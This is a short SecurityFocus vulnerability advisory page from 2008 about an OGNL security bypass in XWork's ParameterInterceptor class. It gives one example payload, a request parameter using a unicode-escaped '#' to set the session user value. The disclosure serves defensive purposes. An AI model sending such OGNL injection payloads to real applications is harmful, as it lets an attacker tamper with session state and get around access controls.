Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

XWork 'ParameterInterceptor' Class OGNL Security Bypass Vulnerability

To exploit this issue, attackers can use readily available tools.

The following example statement is available:

To set #session.user to '0wn3d':

('\u0023' + 'session[\'user\']')(unused)=0wn3d







 

Privacy Statement
Copyright 2008, SecurityFocus